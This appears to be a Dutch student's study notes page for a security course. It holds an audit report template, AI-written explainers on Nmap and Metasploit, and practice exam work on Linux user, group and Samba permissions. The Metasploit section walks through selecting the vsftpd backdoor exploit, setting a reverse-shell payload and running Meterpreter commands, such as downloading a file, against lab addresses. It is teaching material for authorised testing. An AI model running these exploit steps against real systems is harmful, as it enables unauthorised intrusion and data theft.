Sjabloon Auditrapport
Datum : 13-11-2025
Auteur :
Opdrachtgever
Managementsamenvatting
Deze audit is uitgevoerd, omdat het hoofdgebouw van Botters Botenbouw was afgebrand. Aan ons was de taak om voor hun een volledig nieuw netwerk op te bouwen met alles daar omheen. Wij gaan in deze audit uitleggen wat er allemaal gedaan is om dit tot een succes te brengen. Ook gaan we terug kijken op de fouten die zijn gemaakt en wat er beter kon op dat moment. Er waren een aantal kwetsbaarheden, waaronder onvoldoende logging of monitoring. Ook is er geen authenticatie, wat zorgt voor onveilige situaties. De algemene beveiliging van Botters Botenbouw is redelijk op orde, maar er zijn enkele kritieke verbeterpunten nodig om die punten te voorkomen.
[Geef hier in het kort een toelichting voor de technisch projectleider van Botters Botenbouw met de aanleiding voor de audit, de gevonden kwetsbaarheden, de ernst, en met de bijbehorende adviezen.]
Overzicht onderzoek
Wij hebben onderzocht hoe de monitoring van het nieuwe netwerk van Botters Botenbouw is ingericht. Hierbij bleek dat er geen monitoringssysteem aanwezig is om verdachte activiteiten of problemen tijdig te signaleren. Daarnaast hebben we gekeken naar de authenticatie-instellingen en toegangsbewaking, waaruit bleek dat er geen authenticatie is geΓ―mplementeerd, wat risicoβs op onveilige situaties vergroot. Het onderzoek bestond uit het analyseren van de huidige netwerkconfiguratie, het testen van beveiligingsmaatregelen en het beoordelen van de logging- en monitoringmogelijkheden.
[Een toelichting op wat onderzocht is en op welke manier.]
Onderbouwing keuze onderzoekshulpmiddelen
Voor dit onderzoek is gekozen voor tools die eenvoudig inzicht geven in netwerkactiviteiten en beveiligingslekken:
Wireshark, om netwerkverkeer te analyseren en te controleren op ongewenste activiteiten.
Nmap, om te scannen op open poorten en mogelijke kwetsbare diensten binnen het netwerk.
OpenVAS, voor het automatisch detecteren van kwetsbaarheden in systemen en software.
Deze tools zijn gekozen omdat ze samen een compleet beeld geven van netwerkstatus, kwetsbaarheden en monitoring.
[Voor welke tools is gekozen en waarom.]
Gedetailleerde resultaten
Tijdens het onderzoek is vastgesteld dat er geen monitoringssysteem aanwezig is om verdachte activiteiten te signaleren. Ook ontbreekt authenticatie, waardoor onbevoegden eenvoudig toegang kunnen krijgen. Daarnaast is er onvoldoende logging, waardoor incidenten moeilijk te onderzoeken zijn. Deze kwetsbaarheden vormen een serieus risico voor de veiligheid van het netwerk en moeten snel worden aangepakt.
[Geef hier aan welke kwetsbaarheden je hebt gevonden en met welke tool]
Conclusies
De beveiliging van het nieuwe netwerk van Botters Botenbouw is in grote lijnen aanwezig, maar er zijn belangrijke tekortkomingen op het gebied van toegangscontrole en monitoring. Het ontbreken van authenticatie en logging vormt een groot risico voor de veiligheid en continuΓ―teit van de bedrijfsprocessen.
Nummer 1: Geen monitoringssysteem
Nummer 2: Geen authenticatie
Nummer 3: Onvoldoende logging
Verbetervoorstel
1. Betere inlogbeveiliging gebruiken
Prioriteit: Hoog
Het is belangrijk dat alleen mensen met toestemming kunnen inloggen. Zorg daarom voor een veilig inlogsysteem, bijvoorbeeld inloggen met een wachtwoord Γ©n een extra controle (zoals een code via de telefoon). Dit maakt het veel moeilijker voor onbevoegden om binnen te komen.
2. Systeem neerzetten dat het netwerk in de gaten houdt
Prioriteit: Hoog
Plaats een systeem dat de hele tijd het netwerk controleert. Dit systeem kan melden wanneer er iets verdachts gebeurt, zoals een hackpoging. Voorbeelden zijn een Intrusion Detection System (IDS) of andere beveiligingssoftware.
3. Logbestanden verbeteren en vaker controleren
Prioriteit: Middel
Laat het systeem goed bijhouden welke acties worden uitgevoerd (loggen). Controleer deze logbestanden regelmatig. Als er iets misgaat, kun je sneller zien wat er is gebeurd en dit oplossen.
4. Algemene adviezen
Prioriteit: Algemeen
Voer regelmatig controles uit op de IT-beveiliging (audits).
Geef medewerkers trainingen over veilig werken.
Zorg voor duidelijke regels over wat te doen bij een beveiligingsincident.
[Geef in dit hoofdstuk aan welke adviezen je geeft per gevonden kwetsbaarheid. Deze adviezen geef je in de volgorde van de mate van risico, waarbij het grootste risico β grootste impact en grootste kans- bovenaan staan.
Tevens is het mogelijk om bij deze adviezen algemene adviezen op te nemen]
AI uitleg over NMAP en Metasploid (de theorie er achter)
π Nmap (Network Mapper) β samenvatting
Wat is Nmap?
Nmap is een netwerkscanner die wordt gebruikt om:
Hosts (apparaten) op een netwerk te vinden
Open poorten te ontdekken
Te achterhalen welke services en besturingssystemen draaien
Wordt gebruikt door sysadmins Γ©n pentesters.
Waar wordt Nmap voor gebruikt?
Netwerk in kaart brengen (reconnaissance)
Beveiligingscontroles
Controleren of poorten onnodig openstaan
OS- en service-detectie
Voorbereiding op een pentest
Belangrijke scan-types
Port scan β Welke poorten staan open?
Service scan β Welke service + versie draait er?
OS detection β Welk besturingssysteem gebruikt de host?
Vulnerability scanning (beperkt) via scripts
Veelgebruikte Nmap-opties (heel examen-waardig)
-pβ specifieke poorten scannen-sSβ SYN scan (stealth scan)-sTβ TCP connect scan-sUβ UDP scan-sVβ Service & versie detectie-Oβ OS detectie-Aβ Alles (OS, services, scripts, traceroute)-Pnβ Geen ping (handig als ping geblokkeerd is)
Nmap Scripting Engine (NSE)
Scripts voor extra checks
Voorbeelden:
Zwakke configuraties
Bekende kwetsbaarheden
Brute-force checks (login)
π Nmap exploiteert niet, het detecteert.
Voordelen
β Snel
β Zeer krachtig
β Veel info met weinig moeite
Nadelen
β Kan gedetecteerd worden
β Geen echte exploit-tool
π₯ Metasploit β samenvatting
Wat is Metasploit?
Metasploit is een exploit framework dat wordt gebruikt om:
Kwetsbaarheden uit te buiten
Te testen of een systeem Γ©cht kwetsbaar is
π Waar Nmap stopt, gaat Metasploit verder.
Waar wordt Metasploit voor gebruikt?
Penetration testing
Validatie van kwetsbaarheden
Ethical hacking
Security training & labs
Belangrijke onderdelen
Exploit β De aanval zelf (maakt misbruik van een kwetsbaarheid)
Payload β Wat gebeurt er nΓ‘ de aanval (bijv. shell)
Module β Verzamelnaam voor exploit, payload of scanner
Listener β Wacht op verbinding van slachtoffer
Soorten payloads
Reverse shell β Slachtoffer maakt verbinding terug
Bind shell β Aanvaller verbindt naar slachtoffer
Meterpreter β Geavanceerde interactieve shell
Wat kan Meterpreter?
Bestanden uploaden/downloaden
Screenshots maken
Toetsenbordloggers
Processen bekijken
Privilege escalation (soms)
Typische workflow (belangrijk voor examen!)
Informatie verzamelen (vaak met Nmap)
Kwetsbaarheid kiezen
Exploit selecteren
Payload instellen
Exploit uitvoeren
Toegang verkrijgen
Voordelen
β Zeer krachtig
β Realistische pentests
β Veel bekende exploits
Nadelen
β Complex
β Gevaarlijk bij verkeerd gebruik
β Alleen legaal met toestemming
π Nmap vs Metasploit (kort vergelijken)
NmapMetasploitScannerExploit frameworkInformatie verzamelenKwetsbaarheden uitbuitenPassief / actiefActiefReconnaissancePenetrationDetecteertExploiteert
π§ Examen-tip (belangrijk!)
π Gebruik altijd deze volgorde in uitleg:
Eerst Nmap om het doel te verkennen
Daarna Metasploit om kwetsbaarheden te testen
AI uitleg met voorbeeld opdracht (soort van)
π Nmap β toepassen in de praktijk
Stap 1: Kijken welke hosts online zijn
Doel: ontdekken welke apparaten actief zijn op het netwerk.
nmap 192.168.1.0/24
π Resultaat:
Welke IP-adressen online zijn
Vaak ook al welke poorten open zijn
Stap 2: Open poorten scannen
Doel: zien welke poorten bereikbaar zijn op één host.
nmap 192.168.1.10
Of alleen specifieke poorten:
nmap -p 22,80,443 192.168.1.10
Stap 3: Stealth scan (SYN scan)
Doel: minder opvallend scannen (vaak genoemd in examens).
nmap -sS 192.168.1.10
β Wordt vaak gebruikt door pentesters
β Vereist root/admin rechten
Stap 4: Service & versie detectie
Doel: weten wat er draait op een open poort.
nmap -sV 192.168.1.10
π Bijvoorbeeld:
Apache 2.4.49
OpenSSH 7.6
Dit is superbelangrijk voor Metasploit later.
Stap 5: Besturingssysteem detecteren
nmap -O 192.168.1.10
π Resultaat:
Windows
Linux
Soms zelfs versie-indicatie
Stap 6: Alles-in-één scan (examenvriend)
nmap -A 192.168.1.10
Doet:
Poorten
Services
OS-detectie
Scripts
Traceroute
β Wordt snel gedetecteerd β luidruchtig
Stap 7: Nmap scripts gebruiken
Doel: extra checks uitvoeren.
nmap --script vuln 192.168.1.10
π Controleert op bekende kwetsbaarheden
π Nog steeds: detecteren, niet hacken
π₯ Metasploit β toepassen in de praktijk
Stap 1: Metasploit starten
msfconsole
Je zit nu in de Metasploit-omgeving.
Stap 2: Zoeken naar een exploit
Stel: Nmap liet zien dat er een kwetsbare FTP-service draait.
search ftp
Of gerichter:
search vsftpd
Stap 3: Exploit selecteren
use exploit/unix/ftp/vsftpd_234_backdoor
Stap 4: Exploit configureren
show options
Je ziet wat je moet instellen, meestal:
set RHOSTS 192.168.1.10
Soms ook:
set RPORT 21
Stap 5: Payload kiezen
show payloads
Bijvoorbeeld een reverse shell:
set PAYLOAD cmd/unix/reverse set LHOST 192.168.1.5
π LHOST = jouw IP-adres
Stap 6: Exploit uitvoeren
run
of
exploit
Als het lukt:
Je krijgt een shell
Of een Meterpreter sessie
Stap 7: Meterpreter gebruiken (als je die hebt)
Voorbeelden:
sysinfo
ls
pwd
download geheim.txt
screenshot
π Praktijkvoorbeeld (zoals je het moet uitleggen)
Situatie:
Ik wil testen of een server kwetsbaar is.
Ik scan het doel met Nmap:
nmap -sV 192.168.1.10
Ik zie een oude service draaien
Ik zoek een exploit in Metasploit:
search servicenaam
Ik configureer de exploit
Ik voer de exploit uit
Ik controleer of ik toegang krijg
π Zo toon je aan dat de kwetsbaarheid echt is
π§ Examen-zin die je letterlijk kan gebruiken
βEerst gebruik ik Nmap om het netwerk en openstaande services in kaart te brengen. Daarna gebruik ik Metasploit om te testen of een gevonden kwetsbaarheid daadwerkelijk misbruikt kan worden.β
OPRACHT ICE
(is alleen download link omdat het veeel te groot is voor de website)
OPRACHT Kenobi
(is alleen download link omdat het veeel te groot is voor de website)
OEFEN EXAMEN Security W1
π§ Wat betekenen -d en -a bij gpasswd?
gpasswd
gpasswd wordt gebruikt om gebruikers te beheren binnen Linux-groepen.
-d = delete (verwijderen)
gpasswd -d gebruiker groep
β‘οΈ Verwijdert een gebruiker uit een groep
Voorbeeld:
gpasswd -d student sudo
π De gebruiker student wordt uit de sudo-groep gehaald
π Daardoor verliest deze gebruiker beheerrechten
-a = add (toevoegen)
gpasswd -a gebruiker groep
β‘οΈ Voegt een gebruiker toe aan een groep
Voorbeeld:
gpasswd -a salmademirci administratie
π De gebruiker salmademirci krijgt toegang tot de administratiegroep
π§ Kort samengevat (examenzin):
Met
gpasswd -dverwijder je een gebruiker uit een groep en metgpasswd -avoeg je een gebruiker toe aan een groep.
π Volledig uitgevoerde werkzaamheden β stap voor stap (UITGEBREID)
Hieronder staat alles wat jij hebt gedaan, in de juiste volgorde, met uitleg.
Stap 1 β Inloggen en voorbereiden
sudo su
Wat doet dit?
β Hiermee word je root, zodat je systeeminstellingen mag bekijken en aanpassen.
Waarom nodig?
β Gebruikers, groepen en maprechten kun je niet aanpassen zonder rootrechten.
whoami hostname ip a date
Wat deed ik hier?
whoamiβ controleren dat ik root benhostnameβ vaststellen op welke server ik werkip aβ IP-adres van de fileserver vastleggendateβ datum/tijd voor documentatie
Waarom belangrijk?
β Dit hoort bij netjes documenteren van een securityscan.
Stap 2 β Gebruikers inventariseren
getent passwd | awk -F: '$3>=1000 {print $1}'
Wat doet dit commando?
β Toont alle normale gebruikersaccounts (UID β₯ 1000).
Wat zag ik?
Geldige medewerkersaccounts
Extra accounts:
student,bramburg,gast
Conclusie:
β‘οΈ Deze accounts staan niet in de medewerkerslijst
β‘οΈ Dit vormt een potentieel beveiligingsrisico
Stap 3 β Groepen en groepslidmaatschap controleren
getent group
Wat doet dit?
β Laat alle groepen zien die op de server bestaan.
id <gebruikersnaam>
Wat doet dit?
β Laat zien in welke groepen een gebruiker zit.
Wat bleek?
Gebruikers zaten in verkeerde afdelingsgroepen
De groep iedereen werd gebruikt voor toegang
De gebruiker student had sudo-rechten
Conclusie:
β‘οΈ Gebruikers hadden meer rechten dan nodig
β‘οΈ Least-privilege principe werd niet toegepast
Stap 4 β Groepscorrecties uitvoeren
gpasswd -d gebruiker groep
Wat deed ik hier?
β Gebruikers verwijderd uit onjuiste groepen
Voorbeeld:
gpasswd -d bramburg sales
β‘οΈ Niet-medewerker had geen toegang meer tot Sales
gpasswd -a gebruiker groep
Wat deed ik hier?
β Gebruikers toegevoegd aan juiste afdelingsgroep
Voorbeeld:
gpasswd -a salmademirci administratie
gpasswd -d student sudo
Wat deed ik hier?
β Beheerrechten van student verwijderd
Waarom belangrijk?
β‘οΈ Sudo-rechten geven volledige systeemtoegang
β‘οΈ Onterecht sudo = hoog security-risico
Stap 5 β Fileserverlocatie achterhalen
find / -maxdepth 3 -type d -iname "*samba*"
Wat deed dit?
β Zoeken naar Samba-gerelateerde mappen
testparm -s
Wat deed dit?
β Uitlezen van de Samba-configuratie
Resultaat:
β‘οΈ Fileserver staat onder:
/home/fileserver
Stap 6 β Maprechten controleren
ls -la /home/fileserver ls -ld /home/fileserver/*
Wat controleerde ik?
Eigenaar
Groep
Rechten (rwx)
Kritieke bevinding:
β‘οΈ Map management had 777 rechten
β‘οΈ Iedereen had toegang tot managementgegevens
Stap 7 β Rechten corrigeren
chown -R root:groep <map>
Wat deed dit?
β Zorgde dat elke map bij de juiste afdelingsgroep hoort
chmod 2770 <map>
Wat deed dit?
Alleen eigenaar + groep toegang
SetGID zorgt dat nieuwe bestanden juiste groep houden
Resultaat:
β‘οΈ Afdelingen zijn strikt gescheiden
Stap 8 β Praktijktesten uitvoeren
sudo -u salmademirci ls /home/fileserver/administratie sudo -u salmademirci ls /home/fileserver/sales
Resultaat:
Administratie β toegestaan
Sales β permission denied
sudo -u younesbulut ls /home/fileserver/sales sudo -u younesbulut ls /home/fileserver/administratie
Resultaat:
Sales β toegestaan
Administratie β permission denied
Conclusie:
β‘οΈ De beveiliging werkt correct
π§ Eindconclusie (samenvattend, maar inhoudelijk)
Ongeautoriseerde accounts gevonden
Onjuiste groepsindeling ontdekt
Beheerrechten onterecht toegekend
Fileserverrechten veel te ruim
Alles gecorrigeerd Γ©n getest
OEFEN EXAMEN Security opdracht 2
(is eigenlijk uitleg van wat je hebt gedaan met W1, om te laten zien dat je het ook soort van begrijpt)
π Wat is W2 / Opdracht 2 nou eigenlijk?
π Opdracht 1 = doen (technisch fixen)
π Opdracht 2 = uitleggen & onderbouwen (documenteren + risicoβs)
Je hoeft niets nieuws meer te configureren.
Je moet alleen laten zien dat je begrijpt:
β wat er fout was
β waarom dat een risico is
π§ wat jij hebt gedaan om het op te lossen
β hoe je hebt gecontroleerd dat het werkt
π£οΈ wie je informeert en waarom
π Wat betekent dat per onderdeel?
π§Ύ 1. Logboek (bovenste screenshot)
Dit is letterlijk:
βWat heb ik gezien β wat heb ik gedaanβ
Je vult hier per stap in:
KolomWat schrijf je hierDatumDatum waarop je dit deedTijdOngeveer tijdstipOmschrijving kwetsbaarheidWat was er foutActie uitgevoerdWat heb jij gedaan (commando / wijziging)ScreenshotsBewijs (terminal-output)
πΉ Voorbeeld (inhoudelijk):
Kwetsbaarheid: management-map had 777 rechten
Actie: chmod 2770 toegepast
Screenshot: ls -ld voor/na
π Geen theorie, gewoon feiten.
π 2. Onderzoeksverslag (onderste screenshot)
Dit is het verhaal achter je logboek.
πΉ 1.1 Aanleiding onderzoek
π Waarom ben je dit gaan onderzoeken?
Bij jou:
Een collega gaf aan dat bestanden konden worden gedownload zonder juiste authenticatie.
πΉ 1.2 Uitgevoerd onderzoek
π Wat heb jij stap voor stap gedaan?
Hier beschrijf je in woorden:
gebruikers gecontroleerd
groepen bekeken
Samba-config geanalyseerd
maprechten gecontroleerd
testen uitgevoerd
β οΈ Geen commando-lijst, maar uitleg.
πΉ Conclusie
π Wat is je eindbeeld?
Bijvoorbeeld:
De constatering van de collega is bevestigd. Door gasttoegang en onjuiste rechten konden gegevens zonder autorisatie worden benaderd.
πΉ Aanpassing
π Wat heb jij veranderd en werkt het nu?
Hier zeg je:
gasttoegang uitgeschakeld
rechten aangepast
getest met sudo -u
permission denied bevestigd
π£οΈ 3. Communicatiematrix
Dit is geen techniek, maar organisatie.
Je laat zien:
als 1 gebruiker geraakt is β wie bel je
als hele afdeling geraakt is β wie informeer je
als het groot is β directie
π Je vult dit in op basis van jouw bevindingen, niet hypothetisch.
π― Dus om je vraag letterlijk te beantwoorden:
βW2 / opdracht 2 is gewoon uitleggen wat je hebt gevonden en gedaan?β
β Antwoord:
JA. 100%.
En belangrijker:
je hΓ³Γ©ft niets nieuws te verzinnen
je hΓ³Γ©ft niets extraβs te doen op de server
alles wat je nodig hebt, heb je al gedaan
Je moet het alleen:
netjes opschrijven
koppelen aan risicoβs
koppelen aan communicatie
onderbouwen met bewijs
π§ Hoe een docent dit beoordeelt
Ze kijken of jij:
begrijpt waarom iets fout is β
niet alleen klikt, maar nadenkt
weet dat techniek + organisatie samen horen
kunt uitleggen wat je doet (security mindset)
En eerlijk:
π dat laat jij hier keihard zien.
Voorbeeld verslag rapport
π Bijlage 2.1 β Onderzoeksverslag (INGEVULD)
Opdrachtgever
Hanneke Cool, Handelsbedrijf Conley
Auteur
Datum
12-01-2026
Versie
1.0
Aanleiding onderzoek
De directie van Handelsbedrijf Conley heeft aangegeven dat mogelijk gegevens zijn gedownload vanaf fileserver SRV001 zonder juiste authenticatie. Dit onderzoek is uitgevoerd om te bevestigen of deze situatie daadwerkelijk aanwezig was en om de beveiliging van de fileserver te herstellen.
1.2 Uitgevoerd onderzoek
Het onderzoek is gestart door in te loggen als administrator en rootrechten te verkrijgen. Vervolgens zijn gebruikersaccounts en groepsindelingen gecontroleerd. Hierbij zijn ongeautoriseerde accounts en onjuiste groepslidmaatschappen aangetroffen.
Daarna is de Samba-configuratie geanalyseerd met testparm -s, waaruit bleek dat gasttoegang actief was voor bepaalde shares. Ook zijn Linux-bestandsrechten gecontroleerd, waarbij de management-map volledige rechten had.
De bevindingen bevestigen de constatering dat gegevens zonder juiste authenticatie konden worden benaderd.
Conclusie
De constatering van de collega is bevestigd. Door gasttoegang, onjuiste groepsindeling en te ruime bestandsrechten konden gegevens zonder juiste autorisatie worden geraadpleegd. Dit vormde een ernstig beveiligingsrisico.
Aanpassing
De volgende maatregelen zijn doorgevoerd:
Gasttoegang volledig uitgeschakeld in Samba
Gebruikers opnieuw ingedeeld in juiste afdelingsgroepen
Onterecht toegekende sudo-rechten verwijderd
Bestandsrechten aangepast naar 2770 per afdeling
Praktijktesten uitgevoerd om toegang te verifiΓ«ren
Na deze aanpassingen is bevestigd dat alleen geautoriseerde gebruikers toegang hebben tot de juiste gegevens.
Communicatiematrix (hoort al ingevuld te zijn)
π§ Bijlage 2.2 β Begeleidende e-mail (INGEVULD)
Onderwerp: Resultaten securityonderzoek fileserver SRV001
Beste mevrouw Cool,
Op uw verzoek heb ik de fileserver SRV001 onderzocht in verband met mogelijke ongeautoriseerde toegang tot bedrijfsgegevens.
Bevindingen
Uit het onderzoek is gebleken dat gasttoegang actief was en dat bestandsrechten te ruim waren ingesteld. Hierdoor konden gegevens zonder juiste authenticatie worden benaderd.
Risicoβs
Hierdoor bestond het risico op datalekken, verlies van vertrouwelijke informatie en overtreding van AVG-wetgeving.
Adviezen / vervolgstappen
Periodieke controle van gebruikers en rechten
Inschakelen van logging en monitoring
Periodieke security-audits
Wettelijke verplichtingen
Er moet rekening worden gehouden met de AVG, met name de meldplicht datalekken indien blijkt dat persoonsgegevens zijn buitgemaakt.
Met vriendelijke groet,
Bram Roosink
IT expert β SecureIT
π Bijlage 2.4 β Logboek (koppeling)
Je logboek dat je al hebt is volledig geschikt:
Elke stap
Elk commando
Elke bevinding
Elke fix
β Voldoet aan deze opdracht